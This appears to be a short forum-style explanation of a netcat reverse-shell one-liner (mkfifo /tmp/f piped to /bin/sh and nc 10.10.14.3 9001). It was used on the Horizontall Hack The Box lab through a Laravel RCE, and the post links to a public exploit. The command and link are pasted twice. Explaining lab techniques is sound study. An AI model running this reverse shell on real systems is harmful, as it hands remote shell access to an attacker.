rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f
It was used on the Horizontall HTB, (laravel 8 RCE).
Here is the exploit:
https://github.com/nth347/CVE-2021-3129_exploit
rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f
It was used on the Horizontall HTB, (laravel 8 RCE).
Here is the exploit:
https://github.com/nth347/CVE-2021-3129_exploit
It starts a reverse shell that connects to 10.10.14.3 port 9001. The business with /tmp/f is because shell pipelines alone only allow unidirectional communication, but the reverse shell should be bidirectional.